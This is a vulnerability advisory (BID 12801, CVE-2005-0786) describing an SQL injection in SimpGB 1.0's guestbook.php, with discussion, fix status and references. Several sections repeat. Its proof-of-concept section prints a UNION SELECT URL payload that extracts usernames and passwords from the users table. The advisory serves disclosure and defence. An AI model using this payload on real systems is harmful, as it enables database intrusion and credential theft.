SimpGB Guestbook.PHP SQL Injection Vulnerability
BID:12801
Info
SimpGB Guestbook.PHP SQL Injection Vulnerability
| Bugtraq ID: | 12801 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-0786 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 14 2005 12:00AM |
| Updated: | Jul 12 2009 10:56AM |
| Credit: | Discovery of this vulnerability is credited to visus. |
| Vulnerable: |
SimpGB SimpGB 1.0 |
| Not Vulnerable: | |
Discussion
SimpGB Guestbook.PHP SQL Injection Vulnerability
SimpGB is reportedly affected by an SQL injection vulnerability. This issue is due to the application failing to properly sanitize user-supplied input passed to the 'guestbook.php' script before using it in a SQL query.
This vulnerability could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.
SimpGB is reportedly affected by an SQL injection vulnerability. This issue is due to the application failing to properly sanitize user-supplied input passed to the 'guestbook.php' script before using it in a SQL query.
This vulnerability could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.
Exploit / POC
SimpGB Guestbook.PHP SQL Injection Vulnerability
The following example is available:
http://www.example.com/simpgb/guestbook.php?lang=de&mode=new&quote=-1%20UNION%20SELECT%200,0,username,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20simpgb_users%20WHERE%201
The following example is available:
http://www.example.com/simpgb/guestbook.php?lang=de&mode=new&quote=-1%20UNION%20SELECT%200,0,username,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20simpgb_users%20WHERE%201
Solution / Fix
SimpGB Guestbook.PHP SQL Injection Vulnerability
Solution:
It is reported that the vendor has addressed this vulnerability, however this is not confirmed. Customers are advised to contact the vendor in regards to obtaining and applying an appropriate update.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
It is reported that the vendor has addressed this vulnerability, however this is not confirmed. Customers are advised to contact the vendor in regards to obtaining and applying an appropriate update.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
SimpGB Guestbook.PHP SQL Injection Vulnerability
References:
References:
- SimpGB Homepage (SimpGB)
- SimpGB SQL Injection Vulnerability (Alexander_M=FCller?=